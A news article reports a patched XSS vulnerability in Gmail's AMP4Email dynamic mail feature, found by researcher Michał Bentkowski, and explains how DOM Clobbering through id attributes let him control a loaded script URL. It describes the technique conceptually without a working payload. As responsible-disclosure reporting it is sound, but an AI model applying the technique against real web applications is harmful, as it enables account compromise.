Google has recently patched a serious XSS vulnerability affecting Gmail dynamic email feature. The researcher has deemed this vulnerability as a real-world exploitation of DOM Clobbering.
XSS Vulnerability In Gmail Dynamic Email Feature
In a blog post, the security researcher Michał Bentkowski has shared his discovery regarding an XSS vulnerability discoed in Gmail.
The flaw existed in the AMP4Email feature of Gmail. Also known as ‘Dynamic Mail’, the feature basically facilitates in displaying dynamic HTML content in emails, such as threads, or events.
Though, Google has ensured making this feature strong enough to prevent XSS attacks. It employs whitelisting for tags and attributes for dynamic mails. Thus, it isn’t easy for an attacker to introduce any HTML element without explicit permission from the validator.
However, the researcher found that the validator didn’t disallow the id attribute in tags. Hence, he could meddle with this feature in a way that leads to DOM Clobbering.
About DOM Clobbering
Describing this issue, the researcher stated,
Basically, when you create an element in HTML (for instance <input id=username>) and then you want wish to reference it from JavaScript, you would usually use a function like document.getElementById(‘username’) or document.querySelector(‘#username’). But these are not the only ways!
The legacy way is to just access it via a property of global window object. So window.username is in this case exactly the same as document.getElementById(‘username’)! This behaviour (which is known as DOM Cloberring) can lead to interesting vulnerabilities if the application makes decisions based on existence of certain global variables (imagine: if (window.isAdmin) { … }).
DOM Clobbering And AMP4Email
While he found that AMP4Email did restrict some id attribute values, it did become vulnerable to DOM Clobbering in AMP_MODE. Here is what he noticed when he prepared the code to assess the vulnerability.
AMP4Email tries to load certain JS file and fails to do so because of 404. What is particularly eye-catching, however, is the fact that there’s undefined in the middle of the URL… AMP tries to get a property of AMP_MODE to put it in the URL. Because of DOM Clobbering, the expected property is missing, hence undefined.
So, because of the undefined tag, it became possible for the researcher to control the full URL.
Patch Rolled Out
Upon finding the bug, he reported it to Google via the Google Vulnerability Reward Program in August. Google promptly acknowledged his discovery and confirmed the bug.
Soon after, Google fixed the flaw that they called ‘awesome’. Exploit details can be found here
Let us know your thoughts in the comments.